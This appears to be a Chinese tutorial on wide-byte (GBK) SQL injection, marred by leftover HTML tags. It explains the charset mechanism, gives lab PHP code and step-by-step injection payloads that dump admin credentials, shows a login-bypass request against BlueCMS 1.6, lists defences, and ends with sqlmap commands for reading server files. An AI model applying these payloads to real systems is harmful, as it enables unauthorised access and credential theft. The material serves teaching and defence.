宽字节注入深度解析与防御指南<\/h1>

一、宽字节注入原理<\/h2>

1.1 基本概念<\/h3>

宽字节<\/strong>：相对于ASCII单字节编码而言，如GB2312、GBK、GB18030、BIG5、Shift_JIS等<\/li>

编码特点<\/strong>：

GBK编码汉字占用2个字节<\/li>
UTF-8编码汉字占用3个字节<\/li> <\/ul> <\/li>
转义函数<\/strong>：用于过滤用户输入的特殊字符，添加反斜杠""进行转义

MySQL常用转义函数：addslashes、mysql_real_escape_string、mysql_escape_string<\/li>
PHP配置：magic_quote_gpc（高版本已移除）<\/li> <\/ul> <\/li> <\/ul>
1.2 SQL执行过程<\/h3>

客户端编码<\/strong>：<\/p>

PHP默认编码为空时，会根据数据库编码自动确定<\/li>
测试编码类型：
<?<\/span>php<\/span> <\/span><\/span>$m =<\/span> "字"<\/span>; <\/span><\/span>echo<\/span> strlen<\/span>($m); \/\/ 输出3为UTF-8，2为GBK <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 服务器处理<\/strong>：<\/p> 使用character_set_client解码SQL语句<\/li> 使用character_set_connection对解码后的十六进制重新编码<\/li> <\/ul> <\/li> 内部操作转换<\/strong>：<\/p> 优先使用字段CHARACTER SET设定值<\/li> 依次回退：表DEFAULT CHARACTER SET → 数据库DEFAULT CHARACTER SET → character_set_server<\/li> <\/ul> <\/li> 结果输出<\/strong>：<\/p> 按照character_set_results编码输出结果<\/li> <\/ul> <\/li> <\/ol> 1.3 宽字节注入机制<\/h3> 当MySQL使用GBK编码时，会认为两个字符是一个汉字（前一个ASCII码>128）<\/li> 注入过程： %df%27 ===(addslashes)===> %df%5c%27 ===(GBK)===> 運' <\/code><\/pre> %5c是反斜杠""的十六进制<\/li> MySQL GBK编码将%df%5c识别为汉字"運"，使单引号逃逸<\/li> <\/ul> <\/li> <\/ul> 二、实验环境搭建<\/h2> 2.1 实验1：基础宽字节注入<\/h3> 环境配置<\/strong>：<\/p> 数据库名：test<\/li> 数据库编码：GBK<\/li> 关键代码： $conn =<\/span> mysql_connect<\/span>('localhost'<\/span>,'root'<\/span>,'root'<\/span>); <\/span><\/span>mysql_query<\/span>("SET NAMES 'gbk'"<\/span>); <\/span><\/span>mysql_select_db<\/span>('test'<\/span>,$conn); <\/span><\/span>$id =<\/span> isset<\/span>($_GET['id'<\/span>]) ?<\/span> addslashes<\/span>($_GET['id'<\/span>]) :<\/span> 1<\/span>; <\/span><\/span>$sql =<\/span> "SELECT * FROM news WHERE tid='<\/span>{<\/span>$id}<\/span>'"<\/span>; <\/span><\/span><\/code><\/pre><\/li> <\/ul> 注入步骤<\/strong>：<\/p> 测试单引号转义：id=1'<\/code> → 被转义为\'<\/code><\/li> 使用宽字节逃逸：id=1%df'<\/code> → 变为運'<\/code><\/li> 注释多余单引号：id=1%df' -- '<\/code><\/li> 确定字段数：id=1%df' order by 4 -- '<\/code><\/li> 确定显示位：id=-1%df' union select 1,2,3 -- '<\/code><\/li> 获取数据库信息：id=-1%df' union select 1,2,database() -- '<\/code><\/li> 获取表信息（使用十六进制避免引号）： id=-<\/span>1<\/span>%<\/span>df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x74657374 -- '<\/span> <\/span><\/span><\/code><\/pre><\/li> 获取字段信息：id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e -- '<\/code><\/li> 获取数据：id=-1%df' union select 1,2,concat(name,char(58),pass) from admin -- '<\/code><\/li> <\/ol> 2.2 实验2：iconv转换漏洞<\/h3> 环境特点<\/strong>：<\/p> 使用iconv进行UTF-8到GBK转换<\/li> 关键代码： $id =<\/span> iconv<\/span>('utf-8'<\/span>,'gbk'<\/span>,$id); <\/span><\/span>mysql_query<\/span>("SET character_set_connection=gbk, character_set_results=gbk,character_set_client=binary"<\/span>,$conn); <\/span><\/span><\/code><\/pre><\/li> <\/ul> 漏洞原理<\/strong>：<\/p> 汉字"錦"的UTF-8编码：0xe98ca6，GBK编码：0xe55c<\/li> 注入过程：錦' ===(addslashes)===> 錦\' ===(iconv)===> %e5%5c%5c%27 <\/code><\/pre> %5c%5c转义反斜杠，使单引号逃逸<\/li> <\/ul> <\/li> <\/ul> 2.3 实验3：BlueCMS 1.6实战<\/h3> 漏洞位置<\/strong>：\/admin\/login.php<\/code> 利用方式<\/strong>：<\/p> 构造POST请求： POST<\/span> \/bluecmsv1.6\/uploads\/admin\/login.php HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>admin_name=admin%df' or 1=1 -- '&admin_pwd=11&submit=%B5%C7%C2%BC&act=do_login <\/span><\/span><\/code><\/pre><\/li> 漏洞根源：设置SET NAMES gbk<\/code><\/li> 使用deep_addslashes()<\/code>函数调用addslashes()<\/code><\/li> SQL语句：SELECT COUNT(*) AS num FROM blue_admin WHERE admin_name='1 運' or 1=1 -- ' and pwd = md5('$pwd')<\/code><\/li> <\/ul> <\/li> <\/ol> 三、防御措施<\/h2> 3.1 有效防御方案<\/h3> 指定字符集<\/strong>： mysql_set_charset<\/span>('gbk'<\/span>); <\/span><\/span>\/\/ 或 <\/span><\/span><\/span><\/span>SET<\/span> character_set_connection<\/span>=<\/span>gbk<\/span>, character_set_results<\/span>=<\/span>gbk<\/span>,character_set_client<\/span>=<\/span>binary<\/span> <\/span><\/span><\/code><\/pre><\/li> 使用mysql_real_escape_string<\/strong>：考虑当前设置的字符集<\/li> 不会出现df和5c拼接为宽字节的问题<\/li> <\/ul> <\/li> <\/ol> 3.2 防御要点<\/h3> 必须同时满足：正确设置字符集<\/li> 使用mysql_real_escape_string进行转义<\/li> <\/ol> <\/li> 避免单独使用：仅设置字符集无法防御<\/li> 仅使用转义函数可能被宽字节绕过<\/li> <\/ul> <\/li> <\/ul> 四、工具利用<\/h2> 4.1 SQLMap使用<\/h3> 猜解当前用户： python sqlmap.py -u "127.0.0.1\/index.php?id=1%df'"<\/span> --current-user <\/span><\/span><\/code><\/pre><\/li> 读取服务器文件： python sqlmap.py -u "127.0.0.1\/index.php?id=1%df'"<\/span> --file-read=<\/span>".\/index.php"<\/span> <\/span><\/span><\/code><\/pre><\/li> 文件保存路径：\/root\/.sqlmap\/output\/127.0.0.1\/files<\/code><\/li> <\/ol> 五、参考资源<\/h2> 字符编码基础：http:\/\/www.ruanyifeng.com\/blog\/2007\/10\/ascii_unicode_and_utf-8.html<\/li> 宽字节注入详解：https:\/\/lyiang.wordpress.com\/2015\/06\/09\/sql注入：宽字节注入（gbk双字节绕过）<\/li> <\/ol>